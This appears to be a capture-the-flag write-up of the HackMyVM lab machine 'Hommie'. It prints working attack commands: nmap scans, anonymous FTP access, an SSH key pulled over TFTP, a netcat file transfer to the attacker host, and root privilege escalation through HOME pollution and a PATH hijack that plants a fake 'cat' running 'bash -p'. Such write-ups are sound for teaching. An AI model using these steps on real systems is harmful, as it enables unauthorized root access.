HMV Hommie
This is a Linux machine with FTP, SSH, Web and TFTP services enabled. We find the id_rsa of user
alexia via the hints from homepage of web service, thereby we gain an initial foothold on the system.
Then we could obtain the root's id_rsa by exploiting a special SUID program, which allow us to
compromise the system.
Summary
Enumeration
Nmap
Overall
# Nmap 7.98 scan initiated Fri Mar 6 11:24:38 2026 as: nmap -p- --min-rate 3000 -oN overall 192.168.1.96 Nmap scan report for 192.168.1.96 Host is up (0.00011s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:E5:E3:B7 (Oracle VirtualBox virtual NIC) # Nmap done at Fri Mar 6 11:24:43 2026 -- 1 IP address (1 host up) scanned in 4.48 seconds
Detail
# Nmap 7.98 scan initiated Fri Mar 6 11:25:03 2026 as: nmap -sC -sV -O -vv -p21,22,80 -oN detail 192.168.1.96 Nmap scan report for 192.168.1.96 Host is up, received arp-response (0.00041s latency). Scanned at 2026-03-06 11:25:07 CST for 8s PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.1.33 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDB7u7KKhG7At4Hcc+14cLowxLnO8KM0ktmdNGlQ3NQTg5ccopYqycES73Ie8F8x8LuGmUf63rAlZb58bR8mU0mv5gK6+DvTfsxu8Qv4RlK8ydOyEVhIFk2mukt99lNMmWiQdJ4WHlcSkHFJ0V0YsUiMIQpI+OJQ7yFFIGvmP9wbfxrDcZHPZVt86NgTQ0vwQB/1phH0+DxMNjsaE25qwJ9MDdEs7XxMj31YsTWwm3nLxBbl7SFmRsUsSchrNDTQ355c0kco7/H5cGqI9xm3x9VNCaQmNYapKezhAaEWqvIfP59SCaa8n6NpuP2kPuGJnqdqYo+sM5l/SoCWEJL5HlL | 256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFedEUVwZ/C0itzERPAKuSiTugyl9+eZm4f9TQOujQAwyWHvyyiarpJCCqyaQg2DdQEPVMtO7cA3SpkISgseJlA= | 256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO5HkrVfk6hVBmA2oAFN8nYRmsoXH+1hUZIuyF0DN/YA 80/tcp open http syn-ack ttl 64 nginx 1.14.2 |_http-server-header: nginx/1.14.2 | http-methods: |_ Supported Methods: GET HEAD |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:E5:E3:B7 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.98%E=4%D=3/6%OT=21%CT=%CU=33527%PV=Y%DS=1%DC=D%G=N%M=080027%TM= OS:69AA491B%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%T OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5= OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R= OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N% OS:T=40%CD=S) Uptime guess: 46.294 days (since Mon Jan 19 04:21:25 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=260 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Mar 6 11:25:15 2026 -- 1 IP address (1 host up) scanned in 12.15 seconds
The FTP service allow us login with anonymous.
UDPScan
# Nmap 7.98 scan initiated Fri Mar 6 11:25:33 2026 as: nmap -sU --top-ports 32 -oN udpscan 192.168.1.96 Nmap scan report for 192.168.1.96 Host is up (0.00051s latency). Not shown: 30 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc 69/udp open|filtered tftp MAC Address: 08:00:27:E5:E3:B7 (Oracle VirtualBox virtual NIC) # Nmap done at Fri Mar 6 11:26:10 2026 -- 1 IP address (1 host up) scanned in 36.43 seconds
There's a TFTP service may open with port 69.
Web
There're some interesting hints from the homepage of web service.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ curl http://192.168.1.96 alexia, Your id_rsa is exposed, please move it!!!!! Im fighting regarding reverse shells! -nobody
- User
alexia's id_rsa file is exposed that I could gain the foothold of the system if I find it.
And I get nothing more from common.txt for enumeration.
FTP
Then I interactive with FTP service by anonymous user, and gain the index.html and web root
directory. Cause I do not know what language about the backend behind the nginx, the webshell
doesn't work there.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ ftp [email protected] Connected to 192.168.1.96. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 3 0 113 4096 Sep 30 2020 . drwxr-xr-x 3 0 113 4096 Sep 30 2020 .. drwxrwxr-x 2 0 113 4096 Sep 30 2020 .web -rw-r--r-- 1 0 0 0 Sep 30 2020 index.html 226 Directory send OK. ftp> cd .web 250 Directory successfully changed. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxr-x 2 0 113 4096 Sep 30 2020 . drwxr-xr-x 3 0 113 4096 Sep 30 2020 .. -rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
TFTP
Last but not least, there is a TFTP service (UDP 69) may leaks id_rsa (from the hints). I try it and success.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✘≻ tftpy_client -H 192.168.1.96 -f id_rsa
[2026-03-06 12:39:18,706] Sending tftp download request to 192.168.1.96
[2026-03-06 12:39:18,707] filename -> id_rsa
[2026-03-06 12:39:18,707] options -> {}
[2026-03-06 12:39:18,708] Transferred 512 bytes
[2026-03-06 12:39:18,708] Set remote port for session to 51853
[2026-03-06 12:39:18,708] Received DAT from server
[2026-03-06 12:39:18,708] Handling DAT packet - block 1
[2026-03-06 12:39:18,708] Sending ack to block 1
[2026-03-06 12:39:18,708] Transferred 1024 bytes
[2026-03-06 12:39:18,709] Handling DAT packet - block 2
[2026-03-06 12:39:18,709] Sending ack to block 2
[2026-03-06 12:39:18,709] Transferred 1536 bytes
[2026-03-06 12:39:18,709] Handling DAT packet - block 3
[2026-03-06 12:39:18,709] Sending ack to block 3
[2026-03-06 12:39:18,709] Transferred 1823 bytes
[2026-03-06 12:39:18,709] Handling DAT packet - block 4
[2026-03-06 12:39:18,709] Sending ack to block 4
[2026-03-06 12:39:18,709] End of file detected
[2026-03-06 12:39:18,709]
[2026-03-06 12:39:18,709] Download complete.
[2026-03-06 12:39:18,709] Downloaded 1823.00 bytes in 0.00 seconds
[2026-03-06 12:39:18,709] Average rate: 6148.85 kbps
[2026-03-06 12:39:18,709] 0.00 bytes in resent data
[2026-03-06 12:39:18,709] Received 0 duplicate packets
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ ls -l id_rsa
-rw------- 1 curtain curtain 1823 Mar 6 12:39 id_rsa
I gain an initial foothold with that id_rsa and user alexia.
Privilege Escalation
I find a special SUID program by gathering common information about the system.
alexia@hommie:~$ id uid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) alexia@hommie:~$ cat /etc/passwd | grep 'sh$' root:x:0:0:root:/root:/bin/bash alexia:x:1000:1000:alexia,,,:/home/alexia:/bin/bash alexia@hommie:~$ sudo -l -bash: sudo: command not found alexia@hommie:~$ uname -a Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux alexia@hommie:~$ cat /etc/issue Debian GNU/Linux 10 \n \l alexia@hommie:~$ find / -mount -perm -u=s 2>/dev/null /opt/showMetheKey /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/gpasswd /usr/bin/chfn /usr/bin/su /usr/bin/mount /usr/bin/chsh /usr/bin/passwd /usr/bin/newgrp /usr/bin/umount
Then I download this executable with nc:
nc -q 2 192.168.1.33 5555 < /opt/showMetaKey nc -q 2 -lvnp 5555 > showMetaKey
Load it with IDA I get:
int __fastcall main(int argc, const char **argv, const char **envp)
{
setuid(0);
setgid(0);
system("cat $HOME/.ssh/id_rsa");
return 0;
}
Yeah, this program will "read out" the id_rsa via $HOME environment variable. The first approach
come to my mind is that I can pollute the $HOME varible to /root to get root user's id_rsa.
Env Pollution
HOME=/root /opt/showMetheKey
Then I login with that key and become root user.
❰curtain❙~/workspace/shooting/hmvm/hommie❱✔≻ ssh -i root_id_rsa [email protected] ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html Linux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Sep 30 11:03:23 2020 root@hommie:~# id uid=0(root) gid=0(root) groups=0(root) root@hommie:~# cat root@hommie:~# export TERM=xterm root@hommie:~# ls note.txt root@hommie:~# cat note.txt I dont remember where I stored root.txt !!! root@hommie:~# pwd /root root@hommie:~# find / -type f -name root.txt /usr/include/root.txt
PATH Hijacking
Notice the quotion of the "read out", what if I hijacking the $PATH variable to make cat -> bash -p?
Yeah, I can get root shell immediately by executing this program!
alexia@hommie:/tmp$ echo /bin/bash -p > cat alexia@hommie:/tmp$ cat cat /bin/bash -p alexia@hommie:/tmp$ chmod +x cat alexia@hommie:/tmp$ export PATH=/tmp:$PATH alexia@hommie:/tmp$ which cat /tmp/cat alexia@hommie:/tmp$ /opt/showMetheKey root@hommie:/tmp# id uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(alexia)
Read other posts